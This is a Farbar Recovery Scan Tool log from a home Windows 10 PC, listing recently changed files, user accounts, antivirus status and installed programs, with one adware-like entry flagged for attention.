2019-11-24 19:07 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:51 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 18:20 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-24 17:01 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 14:05 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
==================== End of FRST.txt ========================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (24-11-2019 19:51:29)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version:  - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version:  - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version:  - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version:  - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version:  - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version:  - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version:  - )
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version:  - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version:  - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version:  - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version:  - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version:  - )
LLH7X (HKLM-x32\...\LLH7X) (Version:  - )
LLH8X (HKLM-x32\...\LLH8X) (Version:  - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version:  - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version:  - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version:  - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version:  - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
